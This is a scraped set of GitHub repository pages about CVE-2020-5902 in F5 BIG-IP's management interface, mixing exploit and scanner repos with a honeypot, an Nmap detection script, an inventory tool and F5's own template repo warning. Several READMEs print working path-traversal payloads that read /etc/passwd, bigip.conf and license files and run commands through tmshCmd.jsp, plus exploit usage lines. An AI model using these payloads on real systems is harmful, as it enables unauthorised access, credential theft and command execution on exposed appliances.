Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit yassineaboukir committed b15c6a4 9 minutes ago … Update README.md Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 9 minutes ago View code README.md Summary In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. Proof of concept Load /etc/passwd: https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd About Proof of concept for CVE-2020-5902 Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit Shu1L committed 43f72b0 4 minutes ago fofascan Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md fofascan 4 minutes ago fofa.py fofascan 4 minutes ago View code README.md CVE-2020-5902-fofa-scan 介绍 F5 BIG-IP 远程代码执行漏洞(CVE-2020-5902),fofa扫描脚本 利用条件 fofa会员,填入_fofapro_ars_session的值。 自行修改 12行keyword值。 About No description, website, or topics provided. Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit ajdumanhug committed 51341b8 5 minutes ago … Create CVE-2020-5902.py Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902.py Create CVE-2020-5902.py 5 minutes ago README.md Initial commit 5 minutes ago View code README.md CVE-2020-5902 POC About POC Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit IanMuchina committed a1fb899 3 minutes ago add screenshot Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time src Initial Commit 10 minutes ago Dockerfile Initial Commit 10 minutes ago README.md add screenshot 3 minutes ago View code README.md CVE-2020-5902 HoneyPot Docker Image emulating this vulnerabilty found in F5 BIG-IP’s web-based Traffic Management User Interface (TMUI). It's not a real tmui interface Usage docker run -p 1377:443 --hostname example.com muchina/tmui-honeypot This will run the honeypot on port 1377 and hostname as example.com. Alerts You can receive email alerts by using CanaryTokens. Learn more about them here. 1. Creating the token Download this image. Right click > Save Image as Go to the CanaryTokens website Choose "Custom Image Web bug" from the drop down list. Leave a reminder note and an email address Upload the Image Generate the token and copy the url 2. Using the token Run this command, replacing TOKEN_URL with the url of the token you created docker run -e CT="TOKEN_URL" muchina/tmui-honeypot Screenshot Credits I've forked from this docker Image by Muchilwa that does most of the work About No description or website provided. Topics cve-2020-5902 Resources Readme Languages Shell 70.3% Dockerfile 29.7%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit dunderhay committed a365d92 4 minutes ago … Update README.md Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902.py Create CVE-2020-5902.py 7 minutes ago README.md Update README.md 4 minutes ago View code README.md CVE-2020-5902 Python script to exploit F5 Big-IP CVE-2020-5902 - LFI and RCE Examples Exploit LFI: python3 CVE-2020-5902.py -t example.com -x lfi -f /etc/passwd Exploit RCE: python3 CVE-2020-5902.py -t example.com -x rce -a whoami About F5 Big-IP CVE-2020-5902 - LFI and RCE Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit Al1ex committed ca36508 1 minute ago Update README.md Git stats 4 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902-EXP1 Add files via upload 5 minutes ago CVE-2020-5902-EXP2 Add files via upload 5 minutes ago JD-GUI Add files via upload 5 minutes ago hsqldb Add files via upload 5 minutes ago 漏洞源文件 Add files via upload 5 minutes ago README.md Update README.md 1 minute ago View code README.md CVE-2020-5902 CVE-2020-5902-EXP1:Come From https://github.com/jas502n/CVE-2020-5902 CVE-2020-5902-EXP2:Come From https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902 hsqldb:hsqld.jar come from F5 BIGIP sourceCode: Soure Code come from F5 BIGIP About CVE-2020-5902 Resources Readme Releases No releases published Languages Java 89.3% Python 8.2% Shell 2.5%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit itsjeffersonli committed f72e9f4 2 minutes ago Create README.md Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902.sh Add files via upload 3 minutes ago README.md Create README.md 2 minutes ago View code README.md CVE-2020-5902 #Exploit for CVE-2020-5902 POC (bash version) About Exploit for CVE-2020-5902 POC (bash version) Resources Readme Releases No releases published Languages Shell 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit zhzyker committed 2bf933a 2 minutes ago Update readme.md Git stats 6 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time image images 7 minutes ago cve-2020-5902_file.py F5 BIG-IP Read File Scirpt (CVE-2020-5902) 9 minutes ago readme.md Update readme.md 2 minutes ago View code readme.md Readme F5 BIG-IP 任意文件读取+远程命令执行RCE +-------------------------------------------------------------+ + DES: by zhzyker as https://github.com/zhzyker/exphub + + CVE-2020-5902 F5 BIG-IP Read File + RCE   + +-------------------------------------------------------------+ + USE: python3 <filename> <url> + + EXP: python3 cve-2020-5902_file.py https://1.1.1.1:8443 + + VER: BIG-IP 15.x: 15.1.0/15.0.0 + + BIG-IP 14.x: 14.1.0 ~ 14.1.2 + + BIG-IP 13.x: 13.1.0 ~ 13.1.3 + + BIG-IP 12.x: 12.1.0 ~ 12.1.5 + + BIG-IP 11.x: 11.6.1 ~ 11.6.5 + +-------------------------------------------------------------+ Payload Read file /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd Read File About F5 BIG-IP 任意文件读取+远程命令执行RCE Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit ar0dd committed 79e11f1 2 minutes ago … Add files via upload Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902.py Add files via upload 2 minutes ago README.md Update README.md 2 minutes ago View code README.md CVE-2020-5902 POC code for checking for this vulnerability. Since the code has been released, I decided to release this one as well. Patch Immediately! Usage: python3 CVE-2020-5902.py -u https://big-ip.com -o check 2>/dev/null About POC code for checking for this vulnerability. Since the code has been released, I decided to release this one as well. Patch Immediately! Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit sv3nbeast committed ede1017 7 minutes ago … Add files via upload Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902_RCE.py Add files via upload 7 minutes ago README.md Initial commit 12 minutes ago ReadFile.png Add files via upload 8 minutes ago list.png Add files via upload 8 minutes ago rce.png Add files via upload 8 minutes ago result.png Add files via upload 8 minutes ago View code README.md CVE-2020-5902_RCE About No description, website, or topics provided. Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit tututu12138 committed 8a8b98e 2 minutes ago … Update README.md Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902.py Create CVE-2020-5902.py 4 minutes ago README.md Update README.md 2 minutes ago View code README.md CVE-2020-5902 python poc About No description, website, or topics provided. Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit sdcampbell committed 0bb92a4 11 minutes ago … Update README.md Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 11 minutes ago http-f5-tmui-path-traversal.nse Create http-f5-tmui-path-traversal.nse 14 minutes ago View code README.md CVE-2020-5902 Nmap script to detect CVE-2020-5902 in F5 BIG-IP The original author was "b0yd (@rwincey) however, I found the script to be unreliable. I submitted feedback but I don't know how long it will take for them to fix it, so this is my copy which has been tested against a list including vulnerable and non-vulnerable systems and is 100 percent accurate. About Nmap script to detect CVE-2020-5902 in F5 BIG-IP Resources Readme Releases No releases published Languages Lua 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit murataydemir Update README.md … 1b3bc73 6 minutes ago Update README.md 1b3bc73 Git stats 6 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 6 minutes ago View code README.md F5 BIG-IP CVE-2020-5902 Remote Code Execution https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/ About F5 BIG-IP CVE-2020-5902 Remote Code Execution Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit yasserjanah committed 6ade591 5 minutes ago … (^_^) Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time LICENSE Initial commit 15 minutes ago README.md Update README.md 6 minutes ago common_path.txt (^_^) 5 minutes ago exploit-CVE-2020-5902.py (^_^) 5 minutes ago requirements.txt (^_^) 5 minutes ago View code README.md CVE-2020-5902 exploit code for F5-Big-IP (CVE-2020-5902) Summary In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. Proof of concept https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin Usage $ git clone https://github.com/yasserjanah/CVE-2020-5902 $ cd CVE-2020-5902/ $ pip3 install -r ./requirements.txt $ python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd -b to brute force files from a wordlist $ python3 exploit-CVE-2020-5902.py -ip <IP> -b About exploit code for F5-Big-IP (CVE-2020-5902) Resources Readme License GPL-3.0 License Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit nsflabs committed 9f66380 1 minute ago … Update README.md Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 1 minute ago View code README.md CVE-2020-5902 _______ ________ ___ ___ ___ ___ _____ ___ ___ ___ / ____\ \ / / ____| |__ \ / _ \__ \ / _ \ | ____/ _ \ / _ \__ \ | | \ \ / /| |__ ______ ) | | | | ) | | | |______| |__| (_) | | | | ) | | | \ \/ / | __|______/ /| | | |/ /| | | |______|___ \\__, | | | |/ / | |____ \ / | |____ / /_| |_| / /_| |_| | ___) | / /| |_| / /_ \_____| \/ |______| |____|\___/____|\___/ |____/ /_/ \___/____| CVE-2020-5902-Scanner.py @nsflabs This is to test if a single remote system is vulnerable to cve-2020-5902. The F5 BIG-IP Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability. This vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the TMUI, through the BIG-IP management port and/or Self IPs, to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. Installation $ git clone https://github.com/nsflabs/CVE-2020-5902.git $ cd CVE-2020-5902/ $ pip3 install -r requirements.txt Usage $ python3 cve-2020-5902_scanner.py targetip targetport About No description, website, or topics provided. Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit byt3bl33d3r committed 9da2c8c 6 minutes ago … Loading status checks… Updated README with CVE-2020-5902 guide Git stats 57 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time .github Updated README with CVE-2020-5902 guide 6 minutes ago dockerfiles Fixed Hosted Dockerfile 10 days ago tests HTML Reporting now working! 2 days ago witnessme Changed CI workflow 1 hour ago .dockerignore Fixed Dockerfile 10 days ago .gitignore Code push 12 months ago Dockerfile Fixed Dockerfile 10 days ago LICENSE Initial commit 12 months ago Makefile Now a Python Package, Updated dockerfiles 11 days ago README.md Updated README with CVE-2020-5902 guide 6 minutes ago cloudbuild.yaml Added Dockerfiles and updated Readme 3 months ago poetry.lock Fixed CSV reporting, code cleanup 2 days ago pyproject.toml HTML Reporting now working! 2 days ago requirements-dev.txt Fixed CSV reporting, code cleanup 2 days ago requirements.txt Fixed CSV reporting, code cleanup 2 days ago View code README.md WitnessMe My take on a Web Inventory tool, heavily inspired by Eyewitness. Takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium). Supports Python 3.7+, fully asynchronous and has extra bells & whistles that make life easier. Why & what problems does this solve Python 3.7+ No dependency/installation hell, works on a variety of *nix flavors AsyncIO provides Mad Max level speeds Headless chrome/chromium is the best. Provides a RESTful API. Sponsors Table of Contents Note, the documentation is still a WIP. I've released this early because of CVE-2020-5902. WitnessMe Quick starts Finding F5 Load Balancers Vulnerable to CVE-2020-5902 Quick Starts Finding F5 Load Balancers Vulnerable to CVE-2020-5902 Note it is highly recommended to give the Docker container at least 4GB of RAM during large scans as Chromium can be a resource hog. If you keep running into "Page Crash" errors, it's because your container does not have enough memory. On Mac/Windows you can change this by clicking the Docker Task Bar Icon -> Preferences -> Resources. For Linux, refer to Docker's documentation Install WitnessMe using Docker: docker pull byt3bl33d3r/witnessme Get the $IMAGE_ID from the docker images command output, then run the following command to drop into a shell inside the container. Additionally, specify the -v flag to mount the current directory inside the container at the path /transfer in order to copy the scan results back to your host machine (if so desired): docker run -it --entrypoint=/bin/sh -v $(pwd):/transfer $IMAGE_ID Scan your network using WitnessMe, it can accept multiple .Nessus files, Nmap XMLs, IP ranges/CIDRs. Example: witnessme 10.0.1.0/24 192.168.0.1-20 ~/my_nessus_scan.nessus ~/my_nmap_scan.nessus. After the scan is finished, a folder will have been created in the current directory with the results. Access the results using the wmdb command line utility: wmdb scan_2020_$TIME/ To quickly identify F5 load balancers, first perform a signature scan using the scan command. Then search for "BIG-IP" or "F5" using the servers command (this will search for the "BIG-IP" and "F5" string in the signature name, page title and server header): Additionally, you can generate an HTML or CSV report using the following commands: WMDB ≫ generate_report html WMDB ≫ generate_report csv You can then copy the entire scan folder which will contain all of the reports and results to your host machine by copying it to the /transfer folder. Installation Docker Running WitnessMe from a Docker container is fully supported and is the recommended way of using the tool. Pull the image from Docker Hub: docker pull byt3bl33d3r/witnessme You can then spin up a docker container, run it like the main witnessme.py script and pass it the same arguments: docker --rm -ti $IMAGE_ID https://google.com 192.168.0.1/24 Deploying to the Cloud (™) Since WitnessMe has a RESTful API now, you can deploy it to the magical cloud and perform scanning from there. This would have a number of benefits, including giving you a fresh external IP on every scan (More OPSEC safe when assessing attack surface on Red Teams). There are a number of ways of doing this, you can obviously do it the traditional way (e.g. spin up a machine, install docker etc..). Recently cloud service providers started offering ways of running Docker containers directly in a fully managed environment. Think of it as serverless functions (e.g. AWS Lambdas) only with Docker containers. This would technically allow you to really quickly deploy and run WitnessMe (or really anything in a Docker container) without having to worry about underlying infrastructure and removes a lot of the security concerns that come with that. Below are some of the ones I've tried along with the steps necessary to get it going and any issues I encountered. GCP Cloud Run Cloud Run is by far the easiest of these services to work with. This repository includes the cloudbuild.yaml file necessary to get this setup and running. Unfortunately, it seems like Cloud Run doesn't allow outbound internet access to containers, if anybody knows of a way to get around this please get in touch From the repositories root folder (after you authenticated and setup a project), these two commands will automatically build the Docker image, publish it to the Gcloud Container Registry and deploy a working container to Cloud Run: gcloud builds submit --config cloudbuild.yaml gcloud run deploy --image gcr.io/$PROJECT_ID/witnessme --platform managed The output will give you a HTTPS url to invoke the WitnessMe RESTful API from :) When you're done: gcloud run services delete witnessme gcloud container images delete gcr.io/$PROJECT_ID/witnessme AWS ECS/Fargate TO DO Usage & Examples There are 3 main scripts: witnessme.py: is the main CLI interface. wmdb.py: allows you to browse the database (created on each scan) to view results. wmapi.py: provides a RESTful API to schedule, start, stop and monitor scans. usage: witnessme.py [-h] [-p PORTS [PORTS ...]] [--threads THREADS] [--timeout TIMEOUT] target [target ...] positional arguments: target The target IP(s), range(s), CIDR(s) or hostname(s) optional arguments: -h, --help show this help message and exit -p PORTS [PORTS ...], --ports PORTS [PORTS ...] Ports to scan if IP Range/CIDR is provided (default: [80, 8080, 443, 8443]) --threads THREADS Number of concurrent threads (default: 20) --timeout TIMEOUT Timeout for each connection attempt in seconds (default: 15) Can accept a mix of .Nessus file(s), Nmap XML file(s), files containing URLs and/or IPs, IP addresses/ranges/CIDRs and URLs. Long story short, should be able to handle anything you throw at it: python witnessme.py 192.168.1.0/24 192.168.1.10-20 https://bing.com ~/my_nessus_scan.nessus ~/my_nmap_scan.xml ~/myfilewithURLSandIPs Note: as of writing, WitnessMe detects .Nessus and NMap files by their extension so make sure Nessus files have a .nessus extension and NMap scans have a .xml extension If an IP address/range/CIDR is specified as a target, WitnessMe will attempt to screenshot HTTP & HTTPS pages on ports 80, 8080, 443, 8443 by default. This is customizable with the --port argument. Once a scan is completed, a folder with all the screenshots and a database will be in the current directory, point wmdb.py to the database in order to see the results. python wmdb.py scan_2019_11_05_021237/witnessme.db Pressing tab will show you the available commands and a help menu: Searching the Database The servers and hosts commands in the wmdb.py CLI accept 1 argument. WMCLI is smart enough to know what you're trying to do with that argument Server Command No arguments will show all discovered servers. Passing it an argument will search the title and server columns for that pattern (it's case insensitive). For example if you wanted to search for all discovered Apache Tomcat servers: servers tomcat or servers 'apache tomcat' Similarly if you wanted to find servers with a 'login' in the title: servers login Hosts Command No arguments will show all discovered hosts. Passing it an argument will search the IP and Hostname columns for that pattern (it's case insensitive). If the value corresponds to a Host ID it will show you the host information and all of the servers discovered on that host which is extremely useful for reporting purposes and/or when targeting specific hosts. Signature Scan You can perform a signature scan on all discovered services using the scan command. Call for Signatures! If you run into a new webapp write a signature for it! It's beyond simple and they're all in YAML! Don't believe me? Here's the AirOS signature (you can find them all in the signatures directory): credentials: - password: ubnt username: ubnt name: AirOS signatures: - airos_logo.png - form enctype="multipart/form-data" id="loginform" method="post" - align="center" class="loginsubtable" - function onLangChange() # AirOS ubnt/ubnt Yup that's it. Just plop it in the signatures folder and POW! Done. Preview Screenshots Directly in the Terminal (ITerm2 on MacOSX) If you're using ITerm2 on MacOSX, you can preview screenshots directly in the terminal using the show command: To Do Store server info to a database HTML report generation Command line script to search database Support NMap & .nessus files as input Web server categorization Signature scanning Accept URLs as targets (stdin, files) Add support for previewing screenshots in *nix terminals using w3m About Web Inventory tool, takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells & whistles to make life easier. Resources Readme License GPL-3.0 License Releases No releases published Sponsor this project byt3bl33d3r byt3bl33d3r patreon.com/byt3bl33d3r ko-fi.com/byt3bl33d3r Learn more about GitHub Sponsors Packages 2 witnessme latest witnessme-stages 1 Languages Python 90.1% HTML 8.2% Other 1.7%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit Technowlogy-Pushpender Add files via upload … a981de6 14 minutes ago Add files via upload a981de6 Git stats 2 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902.py Add files via upload 14 minutes ago README.md Initial commit 16 minutes ago View code README.md CVE-2020-5902-Scanner Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3 About Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3 Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit JSec1337 committed 9e5d283 6 minutes ago … Create README.md Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Create README.md 6 minutes ago View code README.md RCE-CVE-2020-5902 BIG-IP F5 Remote Code Execution About BIG-IP F5 Remote Code Execution Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit crosbygw committed bd9ea7a 5 minutes ago Update README.md Git stats 78 commits 2 branches 52 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time .github View release notes for v4.1.3 16 months ago AMI Maps View release notes for v5.3.0 5 months ago deploy View release notes for v5.0.1 12 months ago experimental View release notes for v5.6.0 last month iApps View release notes for v4.2.0 14 months ago images View release notes for v2.7.1 2 years ago supported View release notes for v5.6.0 last month .gitattributes View release notes for v3.2.0 2 years ago README.md Update README.md 5 minutes ago aws-bigip-version-matrix.md View release notes for v5.6.0 last month aws-troubleshooting.md View release notes for v5.2.0 7 months ago aws-update-bigip-image.md View release notes for v2.7.1 2 years ago slack-channel-statement.md View release notes for v2.8.0 2 years ago template-index.md View release notes for v5.2.0 7 months ago View code README.md F5 AWS CloudFormation templates CVE-2020-5902 Warning: due to CVE-2020-5902, do not use templates unless using customImageId parameter. Updated images are pending publication to Marketplace. Please see CVE-2020-5902 and Cloud Provider for latest updates. Introduction Welcome to the GitHub repository for F5's CloudFormation templates for deploying F5 in Amazon Web Services. All of the templates in this repository have been developed by F5 Networks engineers. For information on getting started using F5's CFT templates on GitHub, see Amazon Web Services: Solutions 101 and the README files in each directory. Across all branches in this repository, there are two directories: supported and experimental. supported The supported directory contains CloudFormation templates that have been created and fully tested by F5 Networks. These templates are fully supported by F5, meaning you can get assistance if necessary from F5 Technical Support via your typical methods. experimental The experimental directory also contains CloudFormation templates that have been created by F5 Networks. However, these templates have not completed full testing and are subject to change. F5 Networks does not offer technical support for templates in the experimental directory, so use these templates with caution. Template information Descriptions for each template are contained at the top of each template in the Description key. For additional information, including how the templates are generated, and assistance in deploying a template, see the README file on the individual template pages. Standalone and HA production stack templates have been deprecated; a new parameter has been added to existing-stack templates to control deployment of public IP addresses. Matrix for tagged releases F5 has created a matrix that contains all of the tagged releases of the F5 Cloud Formation Templates (CFTs) for Amazon AWS, and the corresponding BIG-IP versions, license types, and throughput levels available for a specific tagged release. See the AWS Matrix. Quick Start The quickstart template allows you to quickly launch an auto scale group of BIG-IP VEs into AWS to demonstrate a typical micro services use case and/or Blue and Green deployment strategy. For detailed information, we recommend you first see the Quick Start README file Or you can use the Launch Stack button to get started: All F5 Supported templates for AWS To see a list of all of our supported AWS CloudFormation templates, see the AWS Supported Template index. Troubleshooting and Known Issues To see steps for troubleshooting common problems with AWS CloudFormation, see the Troubleshooting Steps section. All known issues are on GitHub for better tracking and visibility. See issues with a label of Known Issues at https://github.com/f5networks/f5-aws-cloudformation/issues. Copyright Copyright2014-2019 F5 Networks Inc. License Apache V2.0 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Contributor License Agreement Individuals or business entities who contribute to this project must have completed and submitted the F5 Contributor License Agreement About CloudFormation Templates for quickly deploying BIG-IP services in Amazon Web Services EC2 